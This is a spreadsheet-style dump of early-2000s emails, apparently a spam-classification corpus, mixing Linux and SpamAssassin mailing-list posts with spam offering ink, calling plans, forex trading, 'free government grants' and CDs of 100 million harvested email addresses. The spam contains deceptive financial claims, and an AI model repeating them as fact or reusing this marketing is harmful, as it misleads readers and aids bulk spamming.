  Here&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/center&gt;
  &lt;/body&gt;
  &lt;/html&gt;
 ------=_NextPart_001_0080_01BDF6C7.FABAC1B0--
 ------=_NextPart_000_007F_01BDF6C7.FABAC1B0--
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 22, 2002 at 05:13:01PM +0100, Fergal Moran mentioned:
 &gt; In a nutshell - Solaris is Suns own flavour of UNIX.
  Though I'm sure that this nice person would like a bit more detail.
  Solaris is quite different to Linux, though these days you can make
 solaris act a lot like linux with an extra CD of GNU tools Sun ship with
 solaris. It is based on the SysV unix family, so it's quite similar to
 other unixen like HPUX and SCO.
  Sun's hardware in general is more reliable, and a lot more expensive. One
 of the main bonuses you get by buying Sun is that you are getting your
 hardware and software from one company, so if you have a support contract,
 they have to fix it. They can't fob you off with 'that's a software
 problem, talk to the software vendor.' etc.
  If you are set on Linux, you most likely can do your own support. There
 is then a world of different hardware options. You can run Linux on Sparc,
 though some companies like RedHat don't maintain a sparc port anymore.
  You can also buy your machine from linux-oriented companies like DNUK,
 who do machines designed to run linux, and their own version of linux,
 that has a few extras for their machines. Or, you can get a machine from a
 cheaper company like Dell, and it'll most likely work, most of the time.
 John
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Four Ways to Use Symbols to Add Emotional Depth to Games
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613677,159/
 Date: 2002-10-06T18:12:43+01:00
 Max Payne. Elite Force. Theif. Ico. Deux Ex. Oddworld. Medal of Honor. Baldur's 
 Gate. The more recent Final Fantasy games. More and more developers are pushing 
 the game design envelope, forging new entertainment experiences and art forms 
 that draw on the roots of traditional gaming, but also partake of more 
 sophisticated storytelling and characterization. For game designers involved in 
 creating each successive advancement, these are exciting times.This article 
 will explore four different ways to use symbols to evoke emotional response 
 from an audience.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: dave,Hi,, extra Low price inkjet cartridges joi
</t>
  </si>
  <si>
    <t xml:space="preserve">go..  jm@netnoteinc.com
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Ink Price&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html;"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff"&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="365" align="center"&gt;
   &lt;tr&gt;
     &lt;td&gt;&lt;a href="http://www.inkprice.net/ink"&gt;&lt;img name="smallad1_r1_c1" src="http://64.21.33.223/smad/smallad1_r1_c1.jpg" width="365" height="94" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;&lt;a href="http://www.inkprice.net/ink"&gt;&lt;img name="smallad1_r2_c1" src="http://64.21.33.223/smad/smallad1_r2_c1.jpg" width="365" height="86" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p align="center"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;________________________________________________________________________________________&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif"&gt;If you would 
   not like to get more spacial offers from us, please &lt;a href="http://64.21.33.223/remove.htm"&gt;CLICK 
   HERE&lt;/a&gt; or &lt;a href="mailto:clearmail@btamail.net.cn"&gt;HERE&lt;/a&gt; and you request 
   will be honored immediately!&lt;/font&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
   ________________________________________________________________________________________&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt; &lt;/p&gt;
 &lt;p align="center"&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 dptehbkumnjnuodqcbhuphmmmxplynovkuighl
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Flat-Rate Unlimited Domestic Calling?
 How does it work?
 &gt;From the registered phone line, you can call to any phone in the contiguous 48 States. You speed dial an access #, then you simply dial the number you wish to reach. That's it, how easy can it get?
 * What are the limits?
 The service is only for Voice communication, FAX or data transmissions are not supported. This is for normal residential or small business use. The only thing we ask is that you register your line correctly. If you register as a residence and it is determined that the service has been used as a business we cannot continue to offer you the service.
 What's the price?
 The price of the service is determined by the available access number. With a local access number the residential service is $43.00. If we only offer toll free (800) access in your area then residential service is $63.00. No hidden fees, just one low monthly rate billed to your credit card or drafted from your bank account.
 What calling charges are covered?
 This service will eliminate any per minute charges for: In-state and State-to-state long distance It's all included...
 One Low Monthly Flat Rate for Unlimited Calling and 0 cents per minute!!
 To purchase this product, click on:
 http://www.internationalfreecall.com
 To take a 60 minute trial of this product, send your phone number to:
 8228519@archwireless.net
 To remove yourself from this mailing list, click on:
 http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=1.list&amp;id=1676
</t>
  </si>
  <si>
    <t xml:space="preserve">Okay okay... after reading further I realized this wasn't all that great....
 thanks for the feedback anyway.
 ----- Original Message -----
 From: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;
 To: "Mr. FoRK" &lt;fork_list@hotmail.com&gt;
 Cc: &lt;fork@spamassassin.taint.org&gt;
 Sent: Saturday, August 03, 2002 10:31 PM
 Subject: Re: Using hosts file to rid yourself of popup ads
 &gt; Mr. FoRK wrote:
 &gt; &gt; Don't know if everybody knows this trick...
 &gt;
 &gt; Yes. They do.
 &gt;
 &gt; &gt; &gt; Because we're inherently lazy, this works for windows only,
 &gt;
 &gt; Huh? Oh, that's right, Unix picked up the idea of /etc/hosts
 &gt; from Windows. I keep forgetting.
 &gt;
 &gt;  &gt; &gt; don't use it on a mac!
 &gt;
 &gt; Especially macs running unix (see above).
 &gt;
 &gt; &gt; &gt; We didn't write this file and do not provide
 &gt;  &gt; &gt; support for it's use.
 &gt;
 &gt; We don't even know how to use the fucking English language.
 &gt; --
 &gt; What security level comes after "Totally Apeshit"?
 &gt;      -- http://www.mnftiu.cc/mnftiu.cc/war12.html
 &gt;
 &gt;
 &gt; http://xent.com/mailman/listinfo/fork
 &gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">    &gt;&gt; I wrote a script some time ago to try an minimize the duplicates I
     &gt;&gt; see by calculating a loose checksum, but I still have some
     &gt;&gt; duplicates.  Should I delete the duplicates before training or not?
     Tim&gt; People just can't stop thinking &lt;wink&gt;.  The classifier should work
     Tim&gt; best when trained on a wholly random spattering of real life.  If
     Tim&gt; real life contains duplicates, then that's what the classifier
     Tim&gt; should see.
 A bit more detail.  I get destined for many addresses: skip@pobox.com,
 skip@calendar.com, concerts@musi-cal.com, webmaster@mojam.com, etc.  I
 originally wrote (a slightly different version of) the loosecksum.py script
 I'm about to check in to avoid manually scanning all those presumed spams
 which are really identical.  Once a message was identified as spam, what I
 refer to as a loose checksum was computed to try and avoid saving the same
 spam multiple times for later review.
     &gt;&gt; Would people be interested in the script?  I'd be happy to extricate
     &gt;&gt; it from my local modules and check it into CVS.
     Tim&gt; Sure!  I think it's relevant, but maybe for another purpose.  Paul
     Tim&gt; Svensson is thinking harder about real people &lt;wink&gt; than the rest
     Tim&gt; of us, and he may be able to get use out of approaches that
     Tim&gt; identify closely related spam.  For example, some amount of spam is
     Tim&gt; going to end up in the ham training data in real life use, and any
     Tim&gt; sort of similarity score to a piece of known spam may be an aid in
     Tim&gt; finding and purging it.
 I'll check it in.  Let me know if you find it useful.
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: {i򰸹G     Life-Time upgrades for FREE guarantees6s2n2k6
</t>
  </si>
  <si>
    <t xml:space="preserve">١I±z{iWH IDOL1000jIHUOzJeG
  (noprovisions@bonbox.cz) on P, 7  27, 2002 at 08:33:41
 ---------------------------------------------------------------------------
 G     Life-Time upgrades for FREE guarantees6s2n2k6
 : Why Spend upwards of $4000 on a DVD Burner when we will show you an alternative that will do the exact same thing for just a fraction of the cost? Copy your DVD's NOW. Best Price on the net. Click here: http://010@www.dvdcopyxp.com/cgi-bin/enter.cgi?marketing_id=dcx002 Click to remove http://011@www.spambites.com/cgi-bin/enter.cgi?spambytes_id=100115 
 ---------------------------------------------------------------------------
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] base64 decode problem?
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "CW" == Carlo Wood &lt;carlo@alinoe.com&gt; writes:
 CW&gt; to manually decode the base64 part.
 CW&gt; Can someone please tell me how to do that?
 google: base64 decode
 the first three results look useful.
 -------------------------------------------------------
 In remembrance
 www.osdn.com/911/
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Trading for a living (All you should know about FOREX)
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;Nippon Forex Info Mail&lt;/title&gt;
 	&lt;style&gt;
 	TD {
 	font-family : Verdana;
 	font-size : xx-small;
 	font-style : normal;
 }
 A:link{color: #000000; text-decoration: underline}
 A:active{color: #798675; text-decoration: none}
 A:visited{color: #798675; text-decoration: underline}
 A:hover{color: red; text-decoration: none}
 div,p,td,select{font-family: Verdana, Arial, Tahoma, MS Sans Serif; color=
 : black; font-size: 11px}
 .intro {
 	FONT-FAMILY: Verdana, Arial, Tahoma, MS Sans Serif; FONT-SIZE: 11px; FON=
 T-WEIGHT: normal; LINE-HEIGHT: normal; COLOR: black
 }
 form{margin-top: 0px; margin-bottom: 0px}
 input{margin-bottom: 0px}
 ol,ul{font-family: Verdana, Arial, Tahoma, MS Sans Serif; color: black; f=
 ont-size: 11px; margin-top: 0px}
 pre{font-family: courier new, courier, serif; color: black; font-size: 12=
 px}
 sup{font-size: 80%; margin-top: 0px}
 .title {
 	FONT-FAMILY: Verdana, Arial, Tahoma, MS Sans Serif; FONT-SIZE: 10pt; FON=
 T-WEIGHT: bold; LINE-HEIGHT: normal;  COLOR: #7f7f7f
 }
 .prodtitle {
 	FONT-FAMILY: Eurostyle, Arial, Helvetica, sans-serif; FONT-SIZE: 12pt; F=
 ONT-WEIGHT: bold; LINE-HEIGHT: normal; COLOR: #7f7f7f
 }
 .intro4 {
 	FONT-FAMILY: Verdana, Arial, Tahoma, MS Sans Serif; FONT-SIZE: 10px; FON=
 T-WEIGHT: normal; LINE-HEIGHT: normal; COLOR: #215EB5
 }
 .white {
 	FONT-FAMILY: Verdana, Arial, Tahoma, MS Sans Serif; FONT-SIZE: 10px; FON=
 T-WEIGHT: normal; LINE-HEIGHT: normal; COLOR: #FFFFFF
 }
 .yellow {
 	FONT-FAMILY: Verdana, Arial, Tahoma, MS Sans Serif; FONT-SIZE: 10px; FON=
 T-WEIGHT: normal; LINE-HEIGHT: normal; COLOR: #ffff00
 }
 .black {
 	FONT-FAMILY: Verdana, Arial, Tahoma, MS Sans Serif; FONT-SIZE: 10.5px; F=
 ONT-WEIGHT: normal; LINE-HEIGHT: normal; COLOR: #000000
 }
 .navlink{line-height: 20px; font-weight:bold; text-decoration: none; text=
 -transform: capitalize}
 A.navlink:link{text-decoration: none}
 A.navlink:active{text-decoration: none}
 A.navlink:visited{text-decoration: none}
 A.navlink:hover{text-decoration: none}
 .product{font-weight:bold; text-decoration: none}
 A.product:link{text-decoration: none}
 A.product:active{text-decoration: none}
 A.product:visited{text-decoration: none}
 A.product:hover{text-decoration: none}
 H2 {
 	FONT-FAMILY: Eurostyle, Arial, Helvetica, sans-serif; FONT-SIZE: 8pt; FO=
 NT-WEIGHT: normal; LINE-HEIGHT: normal
 }
 .internalonly{background-color: yellow}
 A.internalonly:link{color: #566B99; background-color: yellow; font-size: =
 12px; text-decoration: underline}
 A.internalonly:active{color: silver; background-color: yellow; font-size:=
  12px; text-decoration: none}
 A.internalonly:visited{color: #666666; background-color: yellow; font-siz=
 e: 12px; text-decoration: underline}
 A.internalonly:hover{color: #333333; background-color: yellow; font-size:=
  12px; text-decoration: none}
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;!--
 *************************************************************************=
 ***
 If you can read this, you're probably not using an HTML-enabled e-mail
 client such as AOL Netscape Messenger or Microsoft Outlook Express,=20
 and cannot properly view this message.=20
 Please do not reply to this e-mail.
 *************************************************************************=
 ***
 --&gt;
 &lt;center&gt;&lt;font face=3D"arial" size=3D"1"&gt;
 To stop receiving Nippon Forex Info news, click on the following &lt;a href=3D=
 "http://www.nipponforex.com/unsub.asp"&gt;link&lt;/a&gt;. .
 &lt;/font&gt;&lt;/center&gt;
 &lt;table align=3D"center" border=3D"1" bordercolor=3D"#808040" width=3D500 =
 cellpadding=3D"0" cellspacing=3D"0"&gt;
 &lt;tr&gt;
 	&lt;td bgcolor=3D"798675" colspan=3D"3" height=3D"15" valign=3D"top"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;tr&gt;
 	&lt;td&gt;
 =09
 	&lt;table&gt;
 =09
 &lt;tr&gt;
 	&lt;td valign=3D"top"&gt;&lt;a href=3D"http://www.nipponforex.com"&gt;&lt;img src=3D"ht=
 tp://www.nipponforex.com/images/NFLogoani.gif" width=3D"200" height=3D"10=
 0" alt=3D"" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td valign=3D"top"&gt;&lt;img src=3D"http://www.nipponforex.com/images/maintop=
 ani.gif" width=3D"375" height=3D"100" alt=3D"" border=3D"0"&gt;&lt;/td&gt;
 	&lt;td&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan=3D"3"&gt;
 &lt;table cellpadding=3D"20"&gt;
 &lt;tr&gt;
 	&lt;td&gt; We are beginning to realize that with the advancement in technology=
 ,&lt;br&gt;
  increased phone services, computers, fax machines, email and high-speed =
 Internet,&lt;br&gt;
  we do not need to be in an office environment in order to access the mar=
 ketplace.&lt;br&gt;
 There is  GREAT MONEY to be made right from the comfort of our HOMES.&lt;br&gt;=
 &lt;br&gt;
 =20
 There is no greater natural attraction for international engagement in in=
 vestments&lt;br&gt;
 than in the world=92s largest and most efficient market =96 Foreign Excha=
 nge Market (Forex).&lt;br&gt;&lt;br&gt;
 =20
 It doesn=92t matter whether you have any trading experience or not.&lt;br&gt;=20
 You can participate in the largest market today and make a GOOD LIVING.&lt;b=
 r&gt;=20
 =20
 Nippon Forex ( &lt;a href=3D"http://www.nipponforex.com"&gt;www.nipponforex.com=
 &lt;/a&gt;) provides full service trading in the Forex  Market,&lt;br&gt;
 includes commission free on-line trading, free charts, news and analysis,=
 &lt;br&gt;&lt;br&gt;=20
 =20
 &lt;ul&gt;
 &lt;li&gt;4 pips spread (!!!)&lt;br&gt;&lt;br&gt;=20
 &lt;li&gt;&lt;a href=3D"http://www.nipponforex.com/econtent.asp?id=3D11&amp;m=3D3"&gt;Inn=
 ovative Micro Account.&lt;/a&gt; Designed to accommodate traders who wish to ri=
 sk smaller amounts with the same automatic execution of their orders as i=
 n the other accounts.&lt;br&gt;&lt;br&gt;=20
 &lt;li&gt;&lt;a href=3D"http://www.nipponforex.com/econtent.asp?id=3D15&amp;m=3D2"&gt;FRE=
 E state of the art =93N-Forex=94&lt;/a&gt;  software =20
 download it now and see for yourself how easy it is to use.&lt;br&gt;&lt;br&gt;
 &lt;li&gt;&lt;a href=3D"http://www.nipponforex.com/econtent.asp?id=3D26&amp;m=3D2"&gt;FRE=
 E demo Account&lt;/a&gt;=20
 with real-time prices, free charts and technical analysis tools.=20
 =20
 &lt;/ul&gt;
 Learn the secrets of successful trading. &lt;a href=3D"http://www.nipponfore=
 x.com/econtent.asp?id=3D19&amp;m=3D1 "&gt;FREE Forex Online Manual&lt;/a&gt;&lt;br&gt;=20
 =20
 offers the best answers to typical questions such as why you should trade=
  currencies,&lt;br&gt;=20
 who the players are, how you can forecast currency behavior and much more=
 !&lt;br&gt;&lt;br&gt;=20
 =20
 You have nothing to lose, so give try it and start&lt;br&gt;=20
 making your life better, easier and a lot more fun!&lt;br&gt;
 =20
 For additional questions feel free to contact us at &lt;a href=3D"mailto:inf=
 o@nipponforex.com"&gt;info@nipponforex.com&lt;/a&gt;.&lt;br&gt;&lt;br&gt;
 =20
 This email is sent in compliance with strict anti-abuse and No SPAM regul=
 ations.&lt;br&gt;=20
 Thank you for your time.&lt;br&gt;&lt;br&gt;
 =20
 Best regards,&lt;br&gt;
 senior project manager&lt;br&gt;
 John Bern&lt;br&gt;
 E-mail: &lt;a href=3D"mailto:info@nipponforex.com"&gt;info@nipponforex.com&lt;/a&gt;&lt;=
 br&gt;=20
 Website: &lt;a href=3D"http://www.nipponforex.com"&gt;www.nipponforex.com&lt;/a&gt;&lt;/=
 td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 	&lt;td colspan=3D"3"&gt;&lt;div align=3D"center"&gt;&lt;a href=3D"http://nipponforex.co=
 m/econtent.asp?id=3D1003&amp;m=3D3"&gt;&lt;img src=3D"http://www.nipponforex.com/im=
 ages/TypesOfAccountsAni_over2.gif" width=3D"175" height=3D"20" alt=3D"" b=
 order=3D"0"&gt;&lt;/a&gt;&lt;/div&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 =09
 =09
 =09
 =09
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;&lt;font face=3D"arial" size=3D"1"&gt;
 &amp;copy;Copyright 2002 Nippon Forex. All rights reserved.&lt;br&gt;
 This email is sent in compliance with strict anti-abuse and No SPAM regul=
 ations.&lt;br&gt;=20
 To stop receiving email from Nippon Forex click on=20
 &lt;A href=3D"http://www.nipponforex.com/unsub.asp"&gt;this link&lt;/A&gt;&lt;/center&gt;
 &lt;! --- Start FAT Banner Code --- !&gt;
 &lt;center&gt;
 &lt;a href=3D"http://www.adtrader.com/ads/adlink.asp?SN=3D3543" TARGET=3D"_t=
 op"&gt;
 &lt;img src=3D"http://www.adtrader.com/ads/adserve.asp?SN=3D3543&amp;PN=3D1&amp;Desc=
 =3DNippon+Forex" width=3D"468" height=3D"60" border=3D"1" alt=3D"The Fina=
 ncial Ad Trader"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;a href=3D"http://www.adtrader.com" TARGET=3D"_top"&gt;
 &lt;img src=3D"http://www.adtrader.com/ads/admark.asp?SN=3D3543"
 width=3D"468" height=3D"18" border=3D"0" alt=3D"The Financial Ad Trader"&gt;=
 &lt;/a&gt;&lt;br&gt;
 &lt;! --- End FAT Banner Code --- !&gt;
 &lt;br&gt;
 &lt;!-- BEGIN LINKEXCHANGE CODE --&gt;
 &lt;center&gt;&lt;iframe src=3D"http://leader.linkexchange.com/X1658678/showiframe=
 ?" width=3D468 height=3D60 marginwidth=3D0 marginheight=3D0 hspace=3D0 vs=
 pace=3D0 frameborder=3D0 scrolling=3Dno&gt;
 &lt;a href=3D"http://leader.linkexchange.com/X1658678/clickle" target=3D"_to=
 p"&gt;&lt;img width=3D468 height=3D60 border=3D0 ismap alt=3D"" src=3D"http://l=
 eader.linkexchange.com/X1658678/showle?"&gt;&lt;/a&gt;&lt;/iframe&gt;&lt;br&gt;&lt;a href=3D"http=
 ://leader.linkexchange.com/X1658678/clicklogo" target=3D"_top"&gt;&lt;img src=3D=
 "http://leader.linkexchange.com/X1658678/showlogo?" width=3D468 height=3D=
 16 border=3D0 ismap alt=3D""&gt;&lt;/a&gt;&lt;br&gt;&lt;/center&gt;
 &lt;!-- END LINKEXCHANGE CODE --&gt;
 &lt;/body&gt;
 &lt;/html&gt;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</si>
  <si>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Email &amp; Fax Directory $99.95 100 million email addresses
</t>
  </si>
  <si>
    <t xml:space="preserve">FUTURE TECH INTERNATIONAL
 SPECIAL OFFER that "BLOWS AWAY TRADITIONAL MARKETING" - Advertising Age.
 The most powerful fully exportable CD Fax Database on the market
 1,500,000 Business Fax Numbers
 OVER 1.5 MILLION FAX NUMBERS FULLY EXPORTABLE!
 Usually Sells for $295. For a limited time only we are offering them for:
 ONLY $49.95 USD
 (Never before have this many fax numbers been sold for so cheap)
 TARGETED EMAIL LIST
 100 MILLION EMAIL ADDRESSES
 Usually sells for $195.00. For a limited time only we are offering them for:
 ONLY $79.95 USD
 SPECIAL PACKAGE DEAL FOR BOTH DIRECTORIES:
 ONLY $99.95 USD
 MORE THAN 34 CATEGORIES SUCH AS:
 -Multi level marketers
 -Opportunity Seekers
 -Telephone Area Code
 -Country, City, State, etc...
 -Travel &amp; Vacations
 -Opt-in
 -People intersted in investments
 -People or businesses who spent more than $1000 on the web in the last 2 months
 -AND MANY MORE
 *Everything o n this disk is in TEXT file format and fully Exportable.
 *The CD is as easy to use as browsing your C drive in Explorer.
 TO ORDER YOURS CALL 416-467-6585
 OR FAX THE FORM BELOW TO 416-467-8986
 ORDER FORM (Please PRINT clearly)
 -------------------------------------------------------------------------------------------------------------------
 Name:
 Company Name:
 Email Address:
 Tel#:
 Shipping Address:
 City:                                   Zip/Postal Code:
 Country:
 ---------------------------------------------------------------------------------------------------------------------
 PRODUCT:
 [] Email Address CDROM (100 Million Addresses) $79.95
 [] Fax Directory (1.5 Million Business Fax Numbers) $49.95
 [] SPECIAL PACKAGE DEAL (Both Fax &amp; Email Directories) $99.95
 SHIPPING OPTIONS:
 [] Regular Mail (1 - 2 weeks delivery) $5.95
 [] Priority Mail (2 - 5 business days) $12.95
 [] Fedex Overnite $25.95
 TOTAL AMOUNT TO BE BILLED TO CREDIT CARD: $
 ----------------------------------------------------------------------------------------------------------------------
 CREDIT CARD INFO:
 [] VISA  [] MASTERCARD  [] AMERICAN EXPRESS
 Card #:
 Expiry Date:
 Name on Card:
 Billing Address:
 Authorized Signature:
 ----------------------------------------------------------------------------------------------------------------------
 PLEASE FAX THIS FORM BACK TO 416-467-8986
 TO ORDER BY MAIL:
 PLEASE send the ORDER FORM BACK and PRODUCT FORM withy a money order payable to FUTURE TECH INTERNATIONAL for the balance to:
 FUTURE TECH INTERNATIONAL
 IMPORT EXPORT COMPANY
 85 THORNCLIFFE PARK DRIVE SUITE 3602
 TORONTO, ONTARIO
 CANADA (POSTAL) M4H 1L6
 FOR ANY QUESTIONS PLEASE FEEL FREE TO CALL US AT 1-416-467-6585
 *PROVIDE YOUR EMAIL ADDRESS SO THAT WE CAN SEND YOU A RECEIPT FOR YOUR TRANSACTION
 For email removals sjshdhd-39e2@yahoo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">All right, can't get pissed though as its a week-day. If we were to do it in
 Lucan, that would be another story ;--)
 Do we have many takers? 
 CW
 -------------
 On Wed, Aug 14, 2002 at 09:22:27AM +0100, Wynne, Conor mentioned:
 &gt; When are we going to have a pint? 
  Tuesday next week. Boars Head, Capel st.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Government Grants You $25,000!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;center&gt;
 &lt;h1&gt;
 &lt;b&gt;&lt;font face="Arial Black"&gt;&lt;font color="#0000FF"&gt;&lt;font size=+2&gt;&amp;nbsp;
 Free Personal and Business Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h1&gt;&lt;/center&gt;
 &lt;p&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=10 WIDTH="419" BGCOLOR="#0000FF" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="397" BGCOLOR="#FFFF00"&gt;
 &lt;center&gt;
 &lt;h2&gt;
 &lt;font face="Arial Narrow"&gt;" Qualify for &lt;u&gt;at least&lt;/u&gt; $25,000 in free
 grants money - Guaranteed! "&lt;/font&gt;&lt;/h2&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font size=+0&gt;Each day over One Million Dollars in Free
 Government&lt;br&gt;
 Grants&amp;nbsp; is given away to people just like you for a wide&lt;br&gt;
 variety of Business And Personal Needs&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Dear Grant Seeker,&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In a moment, I'll tell you
 exactly &lt;b&gt;HOW &amp;amp; WHERE&lt;/b&gt; to get Grants. This &lt;b&gt;MONEY&lt;/b&gt; has to
 be given away, &lt;b&gt;WHY&lt;/b&gt; not to &lt;b&gt;YOU?&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You may be thinking, "How
 can I get some of this Free Grants Money"&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Maybe you think it's impossible
 to get free money?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Let me tell you it's not
 impossible! It's a fact, ordinary people and businesses all across the
 United States are receiving millions of dollars from these Government and
 Private Foundation's everyday.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Who Can Apply?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;ANYONE&lt;/b&gt; can apply
 for a Grant from 18 years old and up!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grants from $500.00 to $50,000.00
 are possible! &lt;b&gt;GRANTS&lt;/b&gt; don't have to be paid back,
 &lt;b&gt;EVER! &lt;/b&gt;Claim
 your slice of the &lt;b&gt;FREE&lt;/b&gt; American Pie.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This money is not a loan,
 Trying to get money through a conventional bank can be very time consuming
 and requires a lot of paperwork, only to find out that you've been denied.
 These Government Agencies don't have to operate under the same stringent
 requirements that banks do.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You decide how much money
 you need, as long as it's a lawful amount and meets with the Government
 Agencies criteria, the money is yours to keep and never has to be repaid.
 This money is non taxable &amp;amp; interest free.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;None of these programs require
 a credit check, collateral, security deposits or co-signers, you can apply
 even if you have a bankruptcy or bad credit, it doesn't matter, you as
 a tax payer and U.S. citizen are entitled to this money.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;There are currently over
 1,400 Federal Programs, 24,000 State Programs, 30,000 Private Foundations
 and 20,000 Scholarship Programs available.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This year over $30 Billion
 Dollars In Free personal and business Government Grants Money will be given
 away by Government Grants Agencies.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER CELLSPACING=0 CELLPADDING=3 WIDTH="80%" BORDERCOLOR="#ffcc66" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="100%"&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+0&gt;Government Personal
 and Business Grants Facts:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over 20 Million People Get Government
 Money Every Year:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;1,000,000 entrepreneurs get money
 to start or expand a business&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;4,000,000 people get money to invest
 in real estate&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;6,000,000 people get money to go
 to college&lt;/font&gt;&lt;/font&gt;
